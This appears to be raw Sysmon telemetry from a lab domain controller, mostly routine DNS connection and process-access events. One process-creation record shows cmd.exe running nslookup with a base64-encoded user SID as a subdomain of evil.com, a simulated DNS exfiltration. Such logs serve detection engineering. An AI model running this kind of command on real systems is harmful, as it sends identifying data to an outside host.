14:16:28.508{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2240-000000005F02}2308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000199642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.073{00000000-0000-0000-0000-000000000000}7184<unknown process>-udptruefalse127.0.0.1-52637-false127.0.0.1-53domain 354300x8000000000000000199641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.072{00000000-0000-0000-0000-000000000000}7184<unknown process>-udpfalsefalse127.0.0.1-52636-false127.0.0.1-53domain 354300x8000000000000000199640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.072{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52636- 354300x8000000000000000199639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.072{00000000-0000-0000-0000-000000000000}7184<unknown process>-udptruefalse127.0.0.1-52636-false127.0.0.1-53domain 10341000x8000000000000000199638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.508{2E1864BB-17BC-629A-2040-000000005F02}35966160C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-2240-000000005F02}2308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.995{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52635- 354300x8000000000000000199636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.994{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52634- 354300x8000000000000000199635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.994{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52633- 354300x8000000000000000199634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.994{00000000-0000-0000-0000-000000000000}6156<unknown process>-udptruefalse127.0.0.1-52633-false127.0.0.1-53domain 154100x8000000000000000199633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.509{2E1864BB-17BC-629A-2240-000000005F02}2308C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-2040-000000005F02}3596C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfamzw.tmp 2>&1 354300x8000000000000000199632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.919{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52632- 354300x8000000000000000199631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.918{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52631- 354300x8000000000000000199630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.917{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52630- 354300x8000000000000000199629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.847{00000000-0000-0000-0000-000000000000}7508<unknown process>-udpfalsefalse127.0.0.1-52629-false127.0.0.1-53domain 354300x8000000000000000199628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.847{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52629- 354300x8000000000000000199627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.847{00000000-0000-0000-0000-000000000000}7508<unknown process>-udptruefalse127.0.0.1-52629-false127.0.0.1-53domain 354300x8000000000000000199626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.847{00000000-0000-0000-0000-000000000000}7508<unknown process>-udpfalsefalse127.0.0.1-52628-false127.0.0.1-53domain 354300x8000000000000000199625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.847{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52628- 354300x8000000000000000199624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.847{00000000-0000-0000-0000-000000000000}7508<unknown process>-udptruefalse127.0.0.1-52628-false127.0.0.1-53domain 354300x8000000000000000199623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.846{00000000-0000-0000-0000-000000000000}7508<unknown process>-udpfalsefalse127.0.0.1-52627-false127.0.0.1-53domain 354300x8000000000000000199622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.846{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52627- 354300x8000000000000000199621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.846{00000000-0000-0000-0000-000000000000}7508<unknown process>-udptruefalse127.0.0.1-52627-false127.0.0.1-53domain 354300x8000000000000000199620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.765{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-52626-false127.0.0.1-53domain 354300x8000000000000000199619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.764{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52626- 354300x8000000000000000199618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.764{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-52626-false127.0.0.1-53domain 354300x8000000000000000199617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.648{00000000-0000-0000-0000-000000000000}2252<unknown process>-udpfalsefalse127.0.0.1-52625-false127.0.0.1-53domain 354300x8000000000000000199616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.647{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52625- 354300x8000000000000000199615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.647{00000000-0000-0000-0000-000000000000}2252<unknown process>-udptruefalse127.0.0.1-52625-false127.0.0.1-53domain 354300x8000000000000000199614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.647{00000000-0000-0000-0000-000000000000}2252<unknown process>-udpfalsefalse127.0.0.1-52624-false127.0.0.1-53domain 354300x8000000000000000199613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.647{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52624- 354300x8000000000000000199612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.647{00000000-0000-0000-0000-000000000000}2252<unknown process>-udptruefalse127.0.0.1-52624-false127.0.0.1-53domain 354300x8000000000000000199611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.646{00000000-0000-0000-0000-000000000000}2252<unknown process>-udpfalsefalse127.0.0.1-52623-false127.0.0.1-53domain 354300x8000000000000000199610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.646{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52623- 354300x8000000000000000199609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.646{00000000-0000-0000-0000-000000000000}2252<unknown process>-udptruefalse127.0.0.1-52623-false127.0.0.1-53domain 354300x8000000000000000199608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.489{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52622- 354300x8000000000000000199607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.489{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52621- 354300x8000000000000000199606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.487{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52620- 354300x8000000000000000199605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.358{00000000-0000-0000-0000-000000000000}968<unknown process>-udpfalsefalse127.0.0.1-52619-false127.0.0.1-53domain 354300x8000000000000000199604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52619- 354300x8000000000000000199603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.358{00000000-0000-0000-0000-000000000000}968<unknown process>-udptruefalse127.0.0.1-52619-false127.0.0.1-53domain 354300x8000000000000000199602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.357{00000000-0000-0000-0000-000000000000}968<unknown process>-udpfalsefalse127.0.0.1-52618-false127.0.0.1-53domain 354300x8000000000000000199601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52618- 354300x8000000000000000199600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.357{00000000-0000-0000-0000-000000000000}968<unknown process>-udptruefalse127.0.0.1-52618-false127.0.0.1-53domain 354300x8000000000000000199599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.357{00000000-0000-0000-0000-000000000000}968<unknown process>-udpfalsefalse127.0.0.1-52617-false127.0.0.1-53domain 354300x8000000000000000199598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52617- 354300x8000000000000000199597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.357{00000000-0000-0000-0000-000000000000}968<unknown process>-udptruefalse127.0.0.1-52617-false127.0.0.1-53domain 354300x8000000000000000199596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.272{00000000-0000-0000-0000-000000000000}3336<unknown process>-udpfalsefalse127.0.0.1-52616-false127.0.0.1-53domain 354300x8000000000000000199595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.272{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52616- 354300x8000000000000000199594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.272{00000000-0000-0000-0000-000000000000}3336<unknown process>-udptruefalse127.0.0.1-52616-false127.0.0.1-53domain 354300x8000000000000000199593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.272{00000000-0000-0000-0000-000000000000}3336<unknown process>-udpfalsefalse127.0.0.1-52615-false127.0.0.1-53domain 10341000x8000000000000000199592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.471{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2140-000000005F02}6172C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.272{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52615- 354300x8000000000000000199590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.272{00000000-0000-0000-0000-000000000000}3336<unknown process>-udptruefalse127.0.0.1-52615-false127.0.0.1-53domain 354300x8000000000000000199589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.271{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52614- 10341000x8000000000000000199588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.471{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2140-000000005F02}6172C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52613- 354300x8000000000000000199586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52612- 354300x8000000000000000199585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52611- 354300x8000000000000000199584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52610- 354300x8000000000000000199583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52609- 354300x8000000000000000199582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{00000000-0000-0000-0000-000000000000}2872<unknown process>-udpfalsefalse127.0.0.1-52608-false127.0.0.1-53domain 354300x8000000000000000199581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52608- 354300x8000000000000000199580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52607- 354300x8000000000000000199579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52606- 354300x8000000000000000199578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{00000000-0000-0000-0000-000000000000}2620<unknown process>-udptruefalse127.0.0.1-52606-false127.0.0.1-53domain 354300x8000000000000000199577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{00000000-0000-0000-0000-000000000000}2620<unknown process>-udpfalsefalse127.0.0.1-52605-false127.0.0.1-53domain 354300x8000000000000000199576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52605- 354300x8000000000000000199575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.060{00000000-0000-0000-0000-000000000000}2620<unknown process>-udptruefalse127.0.0.1-52605-false127.0.0.1-53domain 354300x8000000000000000199574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.985{00000000-0000-0000-0000-000000000000}5764<unknown process>-udpfalsefalse127.0.0.1-52604-false127.0.0.1-53domain 354300x8000000000000000199573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52604- 354300x8000000000000000199572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.985{00000000-0000-0000-0000-000000000000}5764<unknown process>-udptruefalse127.0.0.1-52604-false127.0.0.1-53domain 354300x8000000000000000199571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.985{00000000-0000-0000-0000-000000000000}5764<unknown process>-udpfalsefalse127.0.0.1-52603-false127.0.0.1-53domain 354300x8000000000000000199570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.984{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52603- 354300x8000000000000000199569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.984{00000000-0000-0000-0000-000000000000}5764<unknown process>-udptruefalse127.0.0.1-52603-false127.0.0.1-53domain 354300x8000000000000000199568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.983{00000000-0000-0000-0000-000000000000}5764<unknown process>-udpfalsefalse127.0.0.1-52602-false127.0.0.1-53domain 354300x8000000000000000199567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.983{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52602- 354300x8000000000000000199566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.983{00000000-0000-0000-0000-000000000000}5764<unknown process>-udptruefalse127.0.0.1-52602-false127.0.0.1-53domain 354300x8000000000000000199565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.905{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-52601-false127.0.0.1-53domain 10341000x8000000000000000199564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.455{2E1864BB-17BC-629A-2140-000000005F02}61727408C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2040-000000005F02}3596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.455{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2140-000000005F02}6172C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.439{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.439{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.439{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2040-000000005F02}3596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 